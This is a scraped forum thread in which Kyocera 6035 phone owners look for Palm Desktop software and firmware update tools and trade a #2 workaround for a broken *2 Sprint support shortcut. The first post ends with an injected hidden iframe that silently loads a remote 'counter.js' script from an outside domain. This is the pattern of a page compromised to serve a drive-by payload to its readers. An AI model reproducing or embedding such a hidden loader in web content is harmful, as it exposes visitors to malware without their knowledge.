+ Reply to Thread
Page 1 of 2 1 2 LastLast
    EAlbert

6035 Basic Software

I do so wish I could find SOMEWHERE that has the basic 6035 software online. I have tried Verizon & Kyocera sites neither have the software available.

You go to a new site or get a new laptop and you need to sync your address book. You have to go home (in this case some 83 miles away) get the CD and drive back.

The destop/synch software should be available online somewhere.

/ELA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think you're barking up the wrong tree, or whatever you want to call it

Stop looking for Kyo-specific software and go to Palm's website to download Palm Desktop 4.

EAlbert

OS 4.0 worx?

Why would you recommend the 4.0 software? I was told the 4.0 software would not work properly with the phone.

Anyone? /ELA

[quote:4863583374][i:4863583374]Originally posted by KLiuLess [/i:4863583374]
    [B]I think you're barking up the wrong tree, or whatever you want to call it

Stop looking for Kyo-specific software and go to Palm's website to download Palm Desktop 4. [/quote:4863583374]

The "4.0 software" being refered to is the Palm Desktop V4.01 Desktop Software. It is freely available at the Palm website.

If this does not resolve your problem then you'll need to be a little more specific in describing to us what it is that you are looking for or trying to achieve.

To further add to Hatman's comments:

From reading the posts on this forum, The top revision of the Palm OS you can safely use on the 6035 is 3.53.

Hope this helps...

Regards.

Dave

In case you didn't catch that, there are 2 pieces of software, Palm Desktop and PalmOS. Desktop 4 works w/the 6035, but OS 4 does not.

KLiuLess...

Thanks for the "tip-in"! I should have been clearer in my post. You saved the day...AGAIN! :d

Regards.

Dave

dprado

It doesn't seem to be freely distributed.

[quote:88bc5a8d91][i:88bc5a8d91]Originally posted by hatman [/i:88bc5a8d91]
    [B]The "4.0 software" being refered to is the Palm Desktop V4.01 Desktop Software. It is freely available at the Palm website.

If this does not resolve your problem then you'll need to be a little more specific in describing to us what it is that you are looking for or trying to achieve. [/quote:88bc5a8d91]

Re: It doesn't seem to be freely distributed.

The Palm Desktop 4.0 is free. Gohere.

dprado

Re: Re: It doesn't seem to be freely distributed.

[quote:f974a85998][i:f974a85998]Originally posted by cash70 [/i:f974a85998]
    [B]The Palm Desktop 4.0 is free. Gohere. [/quote:f974a85998]

Thanks Cash! My mistake.

Sprint 6035 SW updates

Does anyone know what the newest files from Sprint are for the 6035?

My phone has:

SW v SX1.0.0.5
    KT 1.1.1.19
    PRL 10015

Is the the newest available? If not what can I do?

Thanks,

James
    Remember, When the long night comes return to the end of the beginning.

Versions

KT1.1.19 is the latest phone image I have heard of for Sprint. Latest PDA image is 1.1.12.

PDA image can be upgraded with tools floating around out there. Search this thread for KWPST

Can't find KWPST

I've been unable to find that KWPST file or the SW update file.

I've tried to connect to that BeBe's website where that file is supposed to be according to some of the posts. But that sites re-direct appears to be down.

Also I searched Dogpile and every other search engine I can think of to find it.

The files are on somebodys computer after they downloaded them. Somebody does still have them don't they??????????????????????????????????????????

James

cartersfarm

In the same boat...

I've also been looking for these files for some time now. It seems that Kyocera has been crawling web sites and posing as people asking for the files, and then they send legal letters and threaten to down ISP connections for distributing copywrited material belonging to them. The only down side is that in Peoria, IL there are no service centers (sales only) for over 100mi, and the sales stores don't even know what KWPST is, much less how to upgrade my phone or enable *2...

At this point I've given up, and I just call the local Sprint store every week and I'm trying to make myself such a pain that they do something to service my phone...

Does your *2 function work on your phone?

My versions are SK 1.1.11 and KT 1.1.19 and PRL 10014. When I try to use Sprint's utility to fix the *2 (contact Sprint &amp; load new PRL over the air), it tells me this is not a Sprint phone (I purchased from BestBuy, Activated over the Web, and it is labeled "Sprint" on the phone and screen... I was on the phone for 2.5 hours and 5 levels of escalation when I first got it trying to get this to work, ending with the SR. support tech saying - "Gee, I don't know what you can do to get this working, just use the 800#, or visit a Sprint Service store after a road trip to Chicago or St. Louis". I'm interested to know your experience.

I just noticed that * 2 doesn't work!

I had not had a reason to try it till now.

I got my phone at a sprint store, they activated it.

*2 did work up and untill they updated it. I tried the activate *2 program, doesn't work for me either. When I press *2 I get a message saying "The feature code you entered is not valid. Please stay on line and customer care will be right with you" Then a voice says 606 (2 second pause) 1, then it disconnects me.

I spent 40 minutes on my landline talking to a Sprint rep 15 minutes re-explaining several times what was happening. He finally entered a trouble ticket for me.

I'm here in Houston, and there's several stores with service centers in them. I have a feeling I'm going to be visiting them soon! :d

I'll keep you advised of my adventures, maybe some good can come out of this by way of more info.

James

Possible *2 Solution????????????

Good Morning All,

I stumbled across something VERY RARE and UNUSUAL. A SprintPCS CS rep that knew the answer to a problem.

The elusive *2 problem.

I went through a lot of grief, (as usual) :d Then found this guy.

I described my problem again an he had me try something, and it works! He says it will work across the SprintPCS network area.

What works for me at least is, drum roll please........

Yes, and it works for me, he said the Star 2 problem is a known one for this phone, and the solution to it (work around) is to use #2.

I may be getting over excited, but try it and let me know what happens for you. I'm in the Houston area.

James :

Tbank you very much for posting that. I just tried it here in the ATL (Atlanta, GA) and it worked.

"Claire" answered just like she used to do with *2.

Great job!
    -- EMu

homer
    True, the *2 problem has been known for some time. There is a prc out that can solve this problem without having to wait for a customer care rep to answer the call and figure out what you are talking about.

If anyone else out there still needs this file, please let me know and I can post it.

homer

Hi Homer,

Unless the file you have is different from the one that Sprint has on their website it is of little use.

I've downloaded the *2 Activate.prc file from their website and it does not work, it says my SprintPCS phone is not a Sprint phone. Even though I purchased it from a SprintPCS store, and had them activate it. I even had Sprint do the update to KT 1.1.1.19 &amp; PRL 10015, and that was when the *2 problem occurred.

So the #2 is a good enough solution for me, I can remember to punch a different key.

Thanks,

James

I tried dialing #2 last night or the night before, and I got the same message as with *2: "This feature is not enabled, please hold while we transfer you to Customer Care."

I live in San Francisco (the city itself).